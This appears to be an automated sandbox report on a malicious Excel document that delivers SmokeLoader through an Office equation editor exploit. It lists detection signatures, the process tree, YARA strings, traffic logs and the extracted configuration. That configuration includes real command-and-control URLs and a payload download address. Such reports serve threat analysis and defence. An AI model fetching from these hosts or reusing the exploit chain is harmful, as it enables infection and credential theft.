Edit tour

Windows Analysis Report
PO-112030087.xls

Overview

General Information

Sample Name:	PO-112030087.xls
Analysis ID:	867360
MD5:	86e893d59d327a8428587fefd183afdc
SHA1:	481bd3469621bf1ce7213641465d23739296ad4c
SHA256:	fbbeeb61e58f001c80e1566d80d2a0defdbdb558f5d11f745b66d25dd241302e
Tags:	xls
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Antivirus / Scanner detection for submitted sample

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Shellcode detected

Office equation editor drops PE file

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

Contains functionality to detect sleep reduction / modifications

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Checks if the current process is being debugged

Drops PE files to the user directory

Found large amount of non-executed APIs

May check if the current machine is a sandbox (GetTickCount - Sleep)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Yara signature match

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Office Equation Editor has been started

Contains functionality to download and launch executables

Document contains embedded VBA macros

Uses Microsoft's Enhanced Cryptographic Provider

Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 868 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2468 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 972 cmdline: "C:\Users\Public\vbc.exe" MD5: BC8DFCB4093F0BB356E3103AF15F3D1B)

vbc.exe (PID: 1664 cmdline: C:\Users\Public\vbc.exe MD5: BC8DFCB4093F0BB356E3103AF15F3D1B)

explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 3872 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3776 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 3724 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3812 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 4020 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 3432 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 3532 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 1492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

explorer.exe (PID: 1796 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

AcroRd32.exe (PID: 1540 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)

RdrCEF.exe (PID: 3260 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)

WINWORD.EXE (PID: 2228 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

taskeng.exe (PID: 2056 cmdline: taskeng.exe {83B777CB-BA22-4166-AE7C-A3886C747AE4} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

rirjijj (PID: 3712 cmdline: C:\Users\user\AppData\Roaming\rirjijj MD5: BC8DFCB4093F0BB356E3103AF15F3D1B)

rirjijj (PID: 4004 cmdline: C:\Users\user\AppData\Roaming\rirjijj MD5: BC8DFCB4093F0BB356E3103AF15F3D1B)

EQNEDT32.EXE (PID: 4012 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 3444 cmdline: "C:\Users\Public\vbc.exe" MD5: BC8DFCB4093F0BB356E3103AF15F3D1B)

vbc.exe (PID: 3436 cmdline: C:\Users\Public\vbc.exe MD5: BC8DFCB4093F0BB356E3103AF15F3D1B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://dropbuyinc.ga/", "http://omacrestinc.ga/"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000006.00000002.1061965505.0000000000341000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.1198613014.00000000028C1000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001A.00000002.1194343464.0000000000081000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000002.1147182548.00000000002A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000002.1146958938.0000000000280000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.1198656708.0000000002931000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001B.00000002.1194283601.0000000000061000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 3432	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 3532	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 11 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 23.95.122.250, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2468, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2468, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://23.95.122.250/24/vbc.exek	Avira URL Cloud: Label: malware
Source: http://23.95.122.250/24/vbc.exej	Avira URL Cloud: Label: malware
Source: http://23.95.122.250/24/vbc.exeC:	Avira URL Cloud: Label: malware
Source: http://23.95.122.250/24/vbc.exe	Avira URL Cloud: Label: malware
Source: http://23.95.122.250/24/vbc.exehhC:	Avira URL Cloud: Label: malware
Source: http://dropbuyinc.ga/(	Avira URL Cloud: Label: malware
Source: http://dropbuyinc.ga/%	Avira URL Cloud: Label: malware
Source: http://dropbuyinc.ga/	Avira URL Cloud: Label: malware
Source: http://dropbuyinc.ga/Mozilla/5.0	Avira URL Cloud: Label: malware
Source: http://dropbuyinc.ga/application/x-www-form-urlencodedMozilla/5.0	Avira URL Cloud: Label: malware
Source: http://23.95.122.250/24/vbc.exeb	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000006.00000002.1061822794.0000000000300000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dropbuyinc.ga/", "http://omacrestinc.ga/"]}

Multi AV Scanner detection for submitted file

Source: PO-112030087.xls	ReversingLabs: Detection: 37%
Source: PO-112030087.xls	Virustotal: Detection: 50%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: PO-112030087.xls

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\rirjijj	ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 36%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rirjijj	Joe Sandbox ML: detected

Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA4C6C0 __vbaAryLock,#644,__vbaStrCat,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,	5_2_0FA4C6C0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0FA4C020 __vbaAryLock,__vbaVarCopy,__vbaRedim,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaLenBstr,__vbaVarMove,__vbaVarMove,__vbaErase,__vbaFreeVar,CryptDeriveKey,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaAryLock,#644,__vbaAryUnlock,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaRedimPreserve,__vbaRedim,__vbaVarZero,__vbaErase,__vbaRedim,__vbaVarZero,__vbaErase,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaErase,__vbaFreeVar,	5_2_0FA4C020
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA4C6C0 __vbaAryLock,#644,__vbaStrCat,__vbaStrCat,__vbaStrMove,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,#644,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,__vbaStrCat,__vbaStrMove,#644,CryptAcquireContextW,__vbaFreeStrList,	6_2_0FA4C6C0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0FA4C020 __vbaAryLock,__vbaVarCopy,__vbaRedim,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaLenBstr,__vbaVarMove,__vbaVarMove,__vbaErase,__vbaFreeVar,CryptDeriveKey,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaVarMove,__vbaVarMove,__vbaAryLock,#644,__vbaAryUnlock,__vbaVarMove,#644,__vbaVarMove,__vbaErase,__vbaRedimPreserve,__vbaRedim,__vbaVarZero,__vbaErase,__vbaRedim,__vbaVarZero,__vbaErase,__vbaRedim,__vbaVarZero,__vbaVarMove,__vbaErase,__vbaFreeVar,	6_2_0FA4C020
Source: C:\Windows\explorer.exe	Code function: 9_2_029350A4 CryptAcquireContextA,	9_2_029350A4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C3208 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,	18_2_000C3208
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C3533 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,	18_2_000C3533
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C3C12 RtlCompareMemory,CryptUnprotectData,	18_2_000C3C12
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C213E CryptUnprotectData,RtlMoveMemory,	18_2_000C213E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C11E6 CryptBinaryToStringA,CryptBinaryToStringA,	18_2_000C11E6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C122F lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,	18_2_000C122F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C1289 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,	18_2_000C1289

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 23.95.122.250 Port: 80

Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Directory queried: number of queries: 1042

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C3CE7 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	18_2_000C3CE7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C1EBA FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	18_2_000C1EBA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 18_2_000C2C85 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	18_2_000C2C85

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036803EA LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036803EA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680483 ShellExecuteW,ExitProcess,	2_2_03680483
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680455 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03680455
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036804A8 ExitProcess,	2_2_036804A8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0368046E ShellExecuteW,ExitProcess,	2_2_0368046E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0368037A URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_0368037A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680404 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03680404
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680345 ExitProcess,	2_2_03680345
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0368035E URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_0368035E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_037003EA LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	16_2_037003EA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_03700455 URLDownloadToFileW,ShellExecuteW,ExitProcess,	16_2_03700455
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_03700483 ShellExecuteW,ExitProcess,	16_2_03700483
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_0370037A URLDownloadToFileW,ShellExecuteW,ExitProcess,	16_2_0370037A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_037004A8 ExitProcess,	16_2_037004A8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_0370046E ShellExecuteW,ExitProcess,	16_2_0370046E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_0370035E URLDownloadToFileW,ShellExecuteW,ExitProcess,	16_2_0370035E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_03700404 URLDownloadToFileW,ShellExecuteW,ExitProcess,	16_2_03700404
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 16_2_03700345 ExitProcess,	16_2_03700345

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 23.95.122.250:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 23.95.122.250:80
